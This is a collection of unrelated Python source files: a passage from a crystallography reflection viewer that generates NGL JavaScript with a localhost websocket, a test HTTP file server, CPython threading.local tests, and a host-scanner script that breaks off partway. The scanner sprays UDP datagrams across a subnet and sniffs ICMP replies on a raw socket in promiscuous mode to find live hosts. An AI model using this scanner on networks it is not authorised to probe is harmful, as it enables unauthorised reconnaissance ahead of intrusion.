if not valarray.anomalous_flag() and self.miller_array.anomalous_flag():
# temporarily expand other arrays to anomalous if self.miller_array is anomalous
valarray = valarray.generate_bijvoet_mates()
missing = self.miller_array.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in validarray
valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices())
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
match_valindices = miller.match_indices(self.miller_array.indices(), valarray.indices() )
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(validarray.info() )
match_valarrays.append( match_valarray )
for i,match_valarray in enumerate(match_valarrays):
foms = None
if match_valarray.is_complex_array():
fomcolm = self.mapcoef_fom_dict.get(match_valarray.info().label_string())
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if fomcolm:
foms = match_valarrays[fomcolm]
otherscene = display.scene(miller_array=match_valarray, merge=merge,
settings=self.settings, foms_array=foms)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NaN values in the colours and radii arrays to -1 before writing javascript
nplst = np.array( list( otherscene.data ) )
mask = np.isnan(nplst)
npcolour = np.array( list(otherscene.colors))
npcolourcol = npcolour.reshape( len(otherscene.data), 3 )
#npcolourcol[mask] = -1
otherscene.colors = flex.vec3_double()
otherscene.colors.extend( flex.vec3_double( npcolourcol.tolist()) )
"""
nplst = np.array( list( otherscene.radii ) )
mask = np.isnan(nplst)
npradii = np.array( list(otherscene.radii))
npradiicol = npradii.reshape( len(otherscene.data), 1 )
npradiicol[mask] = 0.2
otherscene.radii = flex.double( npradiicol.flatten().tolist())
"""
b = flex.bool([bool(math.isnan(e)) for e in otherscene.radii])
# replace any nan values with 0.2
otherscene.radii = otherscene.radii.set_selected(b, 0.2)
d = otherscene.data
if (isinstance(d, flex.int)):
d = [e for e in self.scene.data if e!= display.inanval]
if match_valarray.is_complex_array():
d = otherscene.ampl
maxdata =max( d )
mindata =min( d )
self.othermaxdata.append( maxdata )
self.othermindata.append( mindata )
maxsigmas = minsigmas = display.nanval
if otherscene.sigmas is not None:
d = otherscene.sigmas
maxsigmas = max( d )
minsigmas = min( d )
self.othermaxsigmas.append(maxsigmas)
self.otherminsigmas.append(minsigmas)
# TODO: tag array according to which otherscene is included
self.otherscenes.append( otherscene)
infostr = ArrayInfo(otherscene.miller_array).infostr
self.mprint("%d, %s" %(i, infostr) )
self.matchingarrayinfo.append(infostr)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#--- user input and settings
def update_settings (self) :
self.construct_reciprocal_space(merge=self.merge)
self.DrawNGLJavaScript()
msg = "Rendered %d reflections\n" % self.scene.points.size()
return msg
def process_pick_points (self) :
self.closest_point_i_seq = None
if (self.pick_points is not None) and (self.scene is not None) :
closest_point_i_seq = gltbx.viewer_utils.closest_visible_point(
points=self.scene.points,
atoms_visible=self.scene.visible_points,
point0=self.pick_points[0],
point1=self.pick_points[1])
if (closest_point_i_seq is not None) :
self.closest_point_i_seq = closest_point_i_seq
if (self.closest_point_i_seq is not None) :
self.scene.label_points.add(self.closest_point_i_seq)
self.GetParent().update_clicked(index=self.closest_point_i_seq)
#hkl, d_min, value = self.scene.get_reflection_info(
# self.closest_point_i_seq)
#self.GetParent().update_clicked(hkl, d_min, value)
else :
self.GetParent().update_clicked(index=None)
def UpdateBinValues(self, binvals = [] ):
self.binvals = binvals
def DrawNGLJavaScript(self):
if self.miller_array is None :
self.mprint( "A miller array must be selected for drawing" )
return
self.mprint("Composing NGL JavaScript...")
h_axis = self.scene.axes[0]
k_axis = self.scene.axes[1]
l_axis = self.scene.axes[2]
nrefls = self.scene.points.size()
Hstararrowstart = roundoff( [-h_axis[0]*100, -h_axis[1]*100, -h_axis[2]*100] )
Hstararrowend = roundoff( [h_axis[0]*100, h_axis[1]*100, h_axis[2]*100] )
Hstararrowtxt = roundoff( [h_axis[0]*102, h_axis[1]*102, h_axis[2]*102] )
Kstararrowstart = roundoff( [-k_axis[0]*100, -k_axis[1]*100, -k_axis[2]*100] )
Kstararrowend = roundoff( [k_axis[0]*100, k_axis[1]*100, k_axis[2]*100] )
Kstararrowtxt = roundoff( [k_axis[0]*102, k_axis[1]*102, k_axis[2]*102] )
Lstararrowstart = roundoff( [-l_axis[0]*100, -l_axis[1]*100, -l_axis[2]*100] )
Lstararrowend = roundoff( [l_axis[0]*100, l_axis[1]*100, l_axis[2]*100] )
Lstararrowtxt = roundoff( [l_axis[0]*102, l_axis[1]*102, l_axis[2]*102] )
# make arrow font size roughly proportional to radius of highest resolution shell
fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
arrowstr = """
// xyz arrows
shape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origo');
//blue-x
shape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
shape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
shape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
shape.addText( %s, [ 0, 0, 1 ], %s, 'H');
shape.addText( %s, [ 0, 1, 0 ], %s, 'K');
shape.addText( %s, [ 1, 0, 0 ], %s, 'L');
""" %(str(Hstararrowstart), str(Hstararrowend), str(Kstararrowstart), str(Kstararrowend),
str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt, fontsize,
Kstararrowtxt, fontsize, Lstararrowtxt, fontsize)
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.othermindata[self.icolourcol]
maxcolourscalar = self.othermaxdata[self.icolourcol]
if self.settings.sigma_color:
mincolourscalar = self.otherminsigmas[self.icolourcol]
maxcolourscalar = self.othermaxsigmas[self.icolourcol]
span = maxcolourscalar - mincolourscalar
ln = 51
incr = span/ln
colourscalararray =flex.double()
colourgradarrays = []
val = mincolourscalar
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.otherscenes[self.icolourcol].miller_array.is_complex_array():
incr = 360.0/ln
val = 0.0
fom = 1.0
fomdecr = 1.0/ln
colourscalararray =flex.double()
for j in range(ln):
val += incr
colourscalararray.append( val )
fomln = 10
fom = 1.0
fomdecr = 1.0/ln
fomarrays =[]
# make fomln fom arrays of size ln so as to match the size of colourscalararray when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(ln,fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ))
colourgradarray = colourgradarrays[0] # hack until fom greying has been fully implemented
else:
colourgradarray = graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.settings.color_scheme)
colourgradarray = colourgradarray * 255.0
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff(self.colourgradientvalues)
# colour gradient values to be used below as a <div> tag for the javascript below
colors = self.otherscenes[self.icolourcol].colors
radii = self.otherscenes[self.iradiicol].radii
points = self.scene.points
hkls = self.scene.indices
dres = self.scene.work_array.d_spacings().data()
colstr = self.scene.miller_array.info().label_string()
data = self.scene.data
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.workingbinvals = []
if not self.binarray=="Resolution":
self.workingbinvals = [ self.othermindata[self.binarray] - 0.1 , self.othermaxdata[self.binarray] + 0.1 ]
self.workingbinvals.extend( self.binvals )
self.workingbinvals.sort()
if self.workingbinvals[0] < 0.0:
self.workingbinvals.append(0.0)
self.workingbinvals.sort()
else:
self.workingbinvals = self.binvals
colstr = "dres"
self.nbin = len(self.workingbinvals)
for ibin in range(self.nbin):
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d):
for ibin, binval in enumerate(self.workingbinvals):
if (ibin+1) == self.nbin:
return ibin
if d > binval and d <= self.workingbinvals[ibin+1]:
return ibin
raise Sorry("Should never get here")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if self.binarray=="Resolution":
bindata = dres
else:
bindata = self.otherscenes[self.binarray].data
if self.otherscenes[self.binarray].work_array.is_complex_array():
bindata = self.otherscenes[self.binarray].ampl
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
#ibin = data2bin( self.otherscenes[self.iarray].data[i] )
ibin = data2bin( bindata[i] )
spbufttip = 'H,K,L: %s, %s, %s' %(hkls[i][0], hkls[i][1], hkls[i][2])
spbufttip += '\ndres: %s ' %str(roundoff(dres[i]) )
spbufttip += '\' + AA + \''
for j,otherscene in enumerate(self.otherscenes):
ocolstr = self.valid_arrays[j].info().label_string()
odata = otherscene.data
od =""
if self.valid_arrays[j].is_complex_array():
if not math.isnan(otherscene.foms[i]):
od = str(roundoff(otherscene.ampl[i])) + ", " + str(roundoff(otherscene.phases[i]) ) + \
"\' + DGR + \'" + ", " + str(roundoff(otherscene.foms[i]) )
else:
od = str(roundoff(otherscene.ampl[i])) + ", " + str(roundoff(otherscene.phases[i]) ) + \
"\' + DGR + \'"
elif self.valid_arrays[j].sigmas() is not None:
od = str(roundoff(odata[i]) ) + ", " + str(roundoff(otherscene.sigmas[i]))
else:
od = str(roundoff(odata[i]) )
if math.isnan( abs(odata[i]) ) or odata[i] == display.inanval:
od = "??"
spbufttip += "\n%s: %s" %(ocolstr, od)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
positions[ibin].extend( roundoff(list(hklstars)) )
colours[ibin].extend( roundoff(list( colors[i] ), 2) )
radii2[ibin].append( roundoff(radii[i], 2) )
spbufttips[ibin].append(spbufttip)
spherebufferstr = """
ttips = new Array(%d)
positions = new Array(%d)
colours = new Array(%d)
radii = new Array(%d)
spherebufs = new Array(%d)
""" %(self.nbin, self.nbin, self.nbin, self.nbin, self.nbin)
negativeradiistr = ""
cntbin = 0
self.binstrs = []
for ibin in range(self.nbin):
mstr =""
nreflsinbin = len(radii2[ibin])
if (ibin+1) < self.nbin and nreflsinbin > 0:
mstr= "bin:%d, %d reflections with %s in ]%2.2f; %2.2f]" %(cntbin, nreflsinbin, \
colstr, self.workingbinvals[ibin], self.workingbinvals[ibin+1])
self.binstrs.append(mstr)
self.mprint(mstr, verbose=True)
spherebufferstr += """
// %s
ttips[%d] = %s
positions[%d] = new Float32Array( %s )
colours[%d] = new Float32Array( %s )
radii[%d] = new Float32Array( %s )
spherebufs[%d] = new NGL.SphereBuffer({
position: positions[%d],
color: colours[%d],
radius: radii[%d],
picking: ttips[%d],
})
//}, { disableImpostor: true }) // if true allows wireframe spheres but does not allow resizing spheres
shape.addBuffer(spherebufs[%d])
""" %(mstr, cntbin, str(spbufttips[ibin]).replace('\"', '\''), \
cntbin, str(positions[ibin]), cntbin, str(colours[ibin]), \
cntbin, str(radii2[ibin]), cntbin, cntbin, cntbin, cntbin, cntbin, cntbin )
if self.workingbinvals[ibin] < 0.0:
negativeradiistr += "spherebufs[%d].setParameters({metalness: 1})\n" %cntbin
cntbin += 1
spherebufferstr += """
// create tooltip element and add to the viewer canvas
tooltip = document.createElement("div");
Object.assign(tooltip.style, {
display: "none",
position: "absolute",
zIndex: 10,
pointerEvents: "none",
backgroundColor: "rgba(255, 255, 255, 0.75)",
color: "black",
padding: "0.1em",
fontFamily: "sans-serif"
});
stage.viewer.container.appendChild(tooltip);
// listen to `hovered` signal to move tooltip around and change its text
stage.signals.hovered.add(function (pickingProxy) {
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' )){
var sphere = pickingProxy.sphere;
var cp = pickingProxy.canvasPosition;
tooltip.innerText = pickingProxy.picker[pickingProxy.pid];
tooltip.style.bottom = cp.y + 7 + "px";
tooltip.style.left = cp.x + 8 + "px";
tooltip.style.fontSize = "smaller";
tooltip.style.display = "block";
}else{
tooltip.style.display = "none";
}
});
stage.signals.clicked.add(function (pickingProxy) {
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' )){
var innerText = pickingProxy.picker[pickingProxy.pid];
mysocket.send( innerText);
}
});
"""
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
gradval = "rgba(%s, %s, %s, %s)" %(val[1][0], val[1][1], val[1][2], alpha)
if j%10 == 0:
vstr = str(val[0])
colourgradstr.append([vstr , gradval])
colourgradstr = str(colourgradstr)
#negativeradiistr = ""
#for ibin in range(self.nbin):
# if self.workingbinvals[ibin] < 0.0:
# negativeradiistr += "spherebufs[%d].setParameters({metalness: 1})\n" %ibin
self.NGLscriptstr = """
// Microsoft Edge users follow instructions on
// https://stackoverflow.com/questions/31772564/websocket-to-localhost-not-working-on-microsoft-edge
// to enable websocket connection
var pagename = location.pathname.substring(1);
var mysocket = new WebSocket('ws://127.0.0.1:7894/');
mysocket.onopen = function (e) {
mysocket.send('%s now connected via websocket to ' + pagename + '\\n');
};
mysocket.onclose = function (e) {
mysocket.send('%s now disconnecting from websocket ' + pagename + '\\n');
};
// Log errors to debugger of your browser
mysocket.onerror = function (error) {
console.log('WebSocket Error ' + error);
};
window.addEventListener( 'resize', function( event ){
stage.handleResize();
}, false );
var stage;
var shape;
var shapeComp;
var repr;
var AA = String.fromCharCode(197); // short for angstrom
var DGR = String.fromCharCode(176); // short for degree symbol
function createElement (name, properties, style) {
// utility function used in for loop over colourgradvalarray
var el = document.createElement(name)
Object.assign(el, properties)
Object.assign(el.style, style)
Object.assign(el.style, {
display: "block",
position: "absolute",
color: "black",
fontFamily: "sans-serif",
fontSize: "smaller",
}
)
return el
}
function addElement (el) {
// utility function used in for loop over colourgradvalarray
Object.assign(el.style, {
position: "absolute",
zIndex: 10
})
stage.viewer.container.appendChild(el)
}
var hklscene = function () {
shape = new NGL.Shape('shape');
stage = new NGL.Stage('viewport', { backgroundColor: "grey", tooltip:false,
fogNear: 100, fogFar: 100 });
stage.setParameters( { cameraType: "%s" } );
%s
%s
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
shapeComp.autoView();
repr.update()
// if some radii are negative draw them with wireframe
%s
colourgradvalarray = %s
var j;
var ih = 3;
totalheight = ih*colourgradvalarray.length + 10
// make a white box on top of which boxes with transparent background are placed
// containing the colour values at regular intervals
whitebox = createElement("div",
{
innerText: ''
},
{
backgroundColor: 'rgba(255.0, 255.0, 255.0, 1.0)',
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: "20px",
left: "20px",
width: "40px",
height: totalheight.toString() + "px",
}
);
addElement(whitebox)
for (j = 0; j < colourgradvalarray.length; j++) {
rgbcol = colourgradvalarray[j][1];
val = colourgradvalarray[j][0]
topv = j*ih + 20
mybox = createElement("div",
{
innerText: ''
},
{
backgroundColor: rgbcol,
top: topv.toString() + "px",
left: "60px",
width: "15px",
height: ih.toString() + "px",
}
);
addElement(mybox)
txtbox = createElement("div",
{
innerText: val
},
{
backgroundColor: 'rgba(255.0, 255.0, 255.0, 0.0)',
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: topv.toString() + "px",
left: "20px",
width: "40px",
height: ih.toString() + "px",
}
);
addElement(txtbox)
}
}
document.addEventListener('DOMContentLoaded', function() { hklscene() }, false );
mysocket.onmessage = function (e) {
//alert('Server: ' + e.data);
var c
var alpha
var si
mysocket.send('got ' + e.data ); // tell server what it sent us
try {
val = e.data.split(",")
if (val[0] === "alpha") {
ibin = parseInt(val[1])
alpha = parseFloat(val[2])
spherebufs[ibin].setParameters({opacity: alpha})
stage.viewer.requestRender()
}
if (val[0] === "colour") {
ibin = parseInt(val[1])
si = parseInt(val[2])
colours[ibin][3*si] = parseFloat(val[3])
colours[ibin][3*si+1] = parseFloat(val[4])
colours[ibin][3*si+2] = parseFloat(val[5])
spherebufs[ibin].setAttributes({ color: colours[ibin] })
stage.viewer.requestRender()
}
if (val[0] === "Redraw") {
stage.viewer.requestRender()
}
if (val[0] === "ReOrient") {
mysocket.send( 'Reorienting ' + pagename );
sm = new Float32Array(16);
for (j=0; j<16; j++)
sm[j] = parseFloat(val[j + 2]) // first 2 are "ReOrient", "NGL\\n"
var m = new NGL.Matrix4();
m.fromArray(sm);
stage.viewerControls.orient(m);
stage.viewer.requestRender();
}
if (val[0] === "Reload") {
// refresh browser with the javascript file
cvorient = stage.viewerControls.getOrientation().elements
msg = String(cvorient)
mysocket.send('Current vieworientation:\\n, ' + msg );
mysocket.send( 'Refreshing ' + pagename );
window.location.reload(true);
}
if (val[0] === "Testing") {
// test something new
mysocket.send( 'Testing something new ' + pagename );
var newradii = radii[0].map(function(element) {
return element*1.5;
});
spherebufs[0].setAttributes({
radius: newradii
})
stage.viewer.requestRender()
}
}
catch(err) {
mysocket.send('error: ' + err );
}
};
""" % (self.__module__, self.__module__, self.cameratype, arrowstr, spherebufferstr, \
negativeradiistr, colourgradstr)
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
def OnConnectWebsocketClient(self, client, server):
self.websockclient = client
self.mprint( "New client:" + str( self.websockclient ) )
def OnWebsocketClientMessage(self, client, server, message):
if message != "":
self.mprint( message)
self.lastmsg = message
if "Current vieworientation:" in message:
# The NGL.Matrix4 with the orientation is a list of floats.
self.viewmtrxelms = message[ message.find("\n") : ]
sleep(0.2)
self.mprint( "Reorienting client after refresh:" + str( self.websockclient ) )
if not self.isnewfile:
self.pendingmessage = u"ReOrient, NGL" + self.viewmtrxelms
self.isnewfile = False
def EmptyMsgQueue(self):
while True:
sleep(1)
if hasattr(self, "pendingmessage") and self.pendingmessage:
self.SendWebSockMsg(self.pendingmessage)
self.pendingmessage = None
def StartWebsocket(self):
self.server = WebsocketServer(7894, host='127.0.0.1')
self.server.set_fn_new_client(self.OnConnectWebsocketClient)
self.server.set_fn_message_received(self.OnWebsocketClientMessage)
self.wst = threading.Thread(target=self.server.run_forever)
self.wst.daemon = True
self.wst.start()
self.msgqueuethrd = threading.Thread(target = self.EmptyMsgQueue )
self.msgqueuethrd.daemon = True
self.msgqueuethrd.start()
def SendWebSockMsg(self, msg):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#print "self.server.clients: ", self.server.clients
#print "self.websockclient: ",
if self.websockclient:
while "Refreshing" in self.lastmsg:
sleep(0.5)
self.lastmsg = ""
self.server.send_message(self.websockclient, msg )
else:
self.OpenBrowser()
def SetOpacity(self, bin, alpha):
if bin > self.nbin:
self.mprint( "There are only %d bins of data present" %self.nbin )
return
msg = u"alpha, %d, %f" %(bin, alpha)
self.SendWebSockMsg(msg)
def RedrawNGL(self):
self.SendWebSockMsg( u"Redraw, NGL\n" )
def ReloadNGL(self): # expensive as the javascript file may be several megabytes large
self.mprint("Rendering NGL JavaScript...")
self.SendWebSockMsg( u"Reload, NGL\n" )
def OpenBrowser(self):
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file://" + os.path.abspath( self.hklfname )
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname )
if self.UseOSBrowser:
webbrowser.open(self.url, new=1)
self.isnewfile = False
def TestNewFunction(self):
self.SendWebSockMsg( u"Testing, NGL\n" )
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
import asyncio
import math
import websockets
async def time(websocket, path):
x = 0
for i in range(1000):
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
await websocket.send( msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
await websocket.send( msg )
message = await websocket.recv()
print( message)
await asyncio.sleep(0.2)
start_server = websockets.serve(time, '127.0.0.1', 7894)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
"""
|
httpd.py
|
import hashlib
import os
import threading
from http.server import HTTPServer
from RangeHTTPServer import RangeRequestHandler
class TestRequestHandler(RangeRequestHandler):
checksum_header = None
def end_headers(self):
# RangeRequestHandler only sends Accept-Ranges header if Range header
# is present, see https://github.com/danvk/RangeHTTPServer/issues/23
if not self.headers.get("Range"):
self.send_header("Accept-Ranges", "bytes")
# Add a checksum header
if self.checksum_header:
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file, "r") as fd:
encoded_text = fd.read().encode("utf8")
checksum = hashlib.md5(encoded_text).hexdigest()
self.send_header(self.checksum_header, checksum)
RangeRequestHandler.end_headers(self)
class ETagHandler(TestRequestHandler):
checksum_header = "ETag"
class ContentMD5Handler(TestRequestHandler):
checksum_header = "Content-MD5"
class StaticFileServer:
_lock = threading.Lock()
def __init__(self, handler_class=ETagHandler):
self._lock.acquire()
self._httpd = HTTPServer(("localhost", 0), handler_class)
self._thread = None
def __enter__(self):
self._thread = threading.Thread(target=self._httpd.serve_forever)
self._thread.daemon = True
self._thread.start()
return self._httpd
def __exit__(self, *args):
self._httpd.socket.close()
self._httpd.shutdown()
self._httpd.server_close()
self._lock.release()
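# --- Added usage sketch (not part of the original module) ---
# A minimal example of StaticFileServer, assuming RangeHTTPServer is installed
# and that a file named "example.txt" exists in the current working directory
# (both are illustrative assumptions). The handler adds the checksum header in
# end_headers(), so the response exposes it alongside Accept-Ranges.
import urllib.request

def _demo_static_file_server(filename="example.txt"):
    with StaticFileServer(handler_class=ETagHandler) as httpd:
        host, port = httpd.server_address
        url = "http://%s:%s/%s" % (host, port, filename)
        with urllib.request.urlopen(url) as resp:
            print("ETag:", resp.headers.get("ETag"))
            print("Accept-Ranges:", resp.headers.get("Accept-Ranges"))
            return resp.read()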
|
test_threading_local.py
|
import unittest
from doctest import DocTestSuite
from test import test_support
import threading
import weakref
import gc
class Weak(object):
pass
def target(local, weaklist):
weak = Weak()
local.weak = weak
weaklist.append(weakref.ref(weak))
class ThreadingLocalTest(unittest.TestCase):
def test_local_refs(self):
self._local_refs(20)
self._local_refs(50)
self._local_refs(100)
def _local_refs(self, n):
local = threading.local()
weaklist = []
for i in range(n):
t = threading.Thread(target=target, args=(local, weaklist))
t.start()
t.join()
del t
gc.collect()
self.assertEqual(len(weaklist), n)
# XXX threading.local keeps the local of the last stopped thread alive.
deadlist = [weak for weak in weaklist if weak() is None]
self.assertEqual(len(deadlist), n-1)
# Assignment to the same thread local frees it sometimes (!)
local.someothervar = None
gc.collect()
deadlist = [weak for weak in weaklist if weak() is None]
self.assert_(len(deadlist) in (n-1, n), (n, len(deadlist)))
def test_derived(self):
# Issue 3088: if there is a thread switch inside the __init__
# of a threading.local derived class, the per-thread dictionary
# is created but not correctly set on the object.
# The first member set may be bogus.
import time
class Local(threading.local):
def __init__(self):
time.sleep(0.01)
local = Local()
def f(i):
local.x = i
# Simply check that the variable is correctly set
self.assertEqual(local.x, i)
threads= []
for i in range(10):
t = threading.Thread(target=f, args=(i,))
t.start()
threads.append(t)
for t in threads:
t.join()
def test_derived_cycle_dealloc(self):
# http://bugs.python.org/issue6990
class Local(threading.local):
pass
locals = None
passed = [False]
e1 = threading.Event()
e2 = threading.Event()
def f():
# 1) Involve Local in a cycle
cycle = [Local()]
cycle.append(cycle)
cycle[0].foo = 'bar'
# 2) GC the cycle (triggers threadmodule.c::local_clear
# before local_dealloc)
del cycle
gc.collect()
e1.set()
e2.wait()
# 4) New Locals should be empty
passed[0] = all(not hasattr(local, 'foo') for local in locals)
t = threading.Thread(target=f)
t.start()
e1.wait()
# 3) New Locals should recycle the original's address. Creating
# them in the thread overwrites the thread state and avoids the
# bug
locals = [Local() for i in range(10)]
e2.set()
t.join()
self.assertTrue(passed[0])
def test_main():
suite = unittest.TestSuite()
suite.addTest(DocTestSuite('_threading_local'))
suite.addTest(unittest.makeSuite(ThreadingLocalTest))
try:
from thread import _local
except ImportError:
pass
else:
import _threading_local
local_orig = _threading_local.local
def setUp(test):
_threading_local.local = _local
def tearDown(test):
_threading_local.local = local_orig
suite.addTest(DocTestSuite('_threading_local',
setUp=setUp, tearDown=tearDown)
)
test_support.run_unittest(suite)
if __name__ == '__main__':
test_main()
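# --- Added illustration (not part of the original test module) ---
# A tiny standalone sketch of the property these tests depend on: attributes
# set on a threading.local() instance are visible only to the thread that set
# them. Names below are illustrative.
def _demo_local_isolation():
    local = threading.local()
    results = {}
    def worker(name, value):
        local.x = value            # visible only inside this thread
        results[name] = local.x
    threads = [threading.Thread(target=worker, args=("t%d" % i, i)) for i in range(3)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    # the main thread never set local.x, so the attribute is absent here
    assert not hasattr(local, "x")
    assert results == {"t0": 0, "t1": 1, "t2": 2}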
|
host-scanner.py
|
import ipaddress
import os
import socket
import struct
import sys
import threading
import time
SUBNET = '192.168.0.0/24'
# Signature to check in ICMP responses
MESSAGE = 'YAAAAAS'
class IP:
''' The struct module provides format characters to specify the structure of binary data.
We use these format characters to represent the "IP HEADER" '''
def __init__(self, buff=None):
# Unpack the buffer according to the format string:
# "<" : Little-endian (Kali x64)
# "B" : 1-byte, Unsigned char
# "H" : 2-byte, Unsigned short
# "4s" : 4-byte, char[4]
header = struct.unpack('<BBHHHBBH4s4s', buff)
# struct has no format char for a nibble (4 bits):
# for the ver variable, right-shift the byte by 4 places
# to get the high-order nibble of the first byte
self.ver = header[0] >> 4 # Version
# The header length is the low-order nibble, obtained with
# a bitwise AND against 0xF (00001111)
self.ihl = header[0] & 0xF # IP Header Length
self.tos = header[1] # Type of Service (Priority messages)
self.len = header[2] # Total Length (Includes IP header and subsequent data) <---Might want to modify this header ;)
self.id = header[3] # Identification (Reassembles fragmented packets with this number)
self.offset = header[4] # Fragment Offset (Stitches fragments together)
self.ttl = header[5] # Time-to-live
self.protocol_num = header[6] # Protocol (What header to look for in transport header)
self.sum = header[7] # Header checksum (Integrity) <---Might want to modify this header ;)
self.src = header[8] # Source IP
self.dst = header[9] # Destination IP
# Human readable IP addresses
self.src_address = ipaddress.ip_address(self.src)
self.dst_address = ipaddress.ip_address(self.dst)
# Map protocol constants to their names
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
try:
self.protocol = self.protocol_map[self.protocol_num]
except Exception as e:
print('%s No protocol for %s' % (e,self.protocol_num))
self.protocol = str(self.protocol_num)
class ICMP:
def __init__(self, buff):
header = struct.unpack('<BBHHH', buff)
self.type = header[0] # ICMP Type message number
self.code = header[1] # Code
self.sum = header[2] # Checksum
self.id = header[3] # Identifier
self.seq = header[4] # Sequence number
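# --- Added illustration: round-tripping the header formats above ---
# A hedged, self-contained check of the struct layouts used by IP and ICMP.
# It packs synthetic headers with the same format strings and parses them back;
# it never touches the network. The sample addresses are illustrative.
def _demo_parse_headers():
    sample_ip = struct.pack(
        '<BBHHHBBH4s4s',
        (4 << 4) | 5,                     # version 4, ihl 5 (5 * 4 = 20 bytes)
        0,                                # type of service
        20 + 8,                           # total length: IP header + ICMP header
        0x1234,                           # identification
        0,                                # fragment offset
        64,                               # time-to-live
        1,                                # protocol 1 = ICMP
        0,                                # checksum (not verified here)
        socket.inet_aton('192.168.0.10'), # source address
        socket.inet_aton('192.168.0.24')) # destination address
    ip_header = IP(sample_ip)
    print(f'{ip_header.src_address} -> {ip_header.dst_address} ({ip_header.protocol})')
    # Destination Unreachable / Port Unreachable is type 3, code 3 --
    # the combination sniff() looks for.
    icmp_header = ICMP(struct.pack('<BBHHH', 3, 3, 0, 0, 0))
    print(f'ICMP type={icmp_header.type} code={icmp_header.code}')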
def udp_sender():
''' Sprays UDP datagrams carrying the chosen message to port 65212 '''
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
for ip in ipaddress.ip_network(SUBNET).hosts():
sender.sendto(bytes(MESSAGE, 'utf8'), (str(ip), 65212))
class Scanner:
def __init__(self, host):
self.host = host
if os.name == 'nt':
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
self.socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
self.socket.bind((host,0))
# Include IP header
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
if os.name == 'nt':
# Put the NIC into promiscuous mode
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
def sniff(self):
# a set stores multiple items in a single variable without duplicates
alive_hosts = set([f'{str(self.host)}*'])
try:
while True:
# read a packet
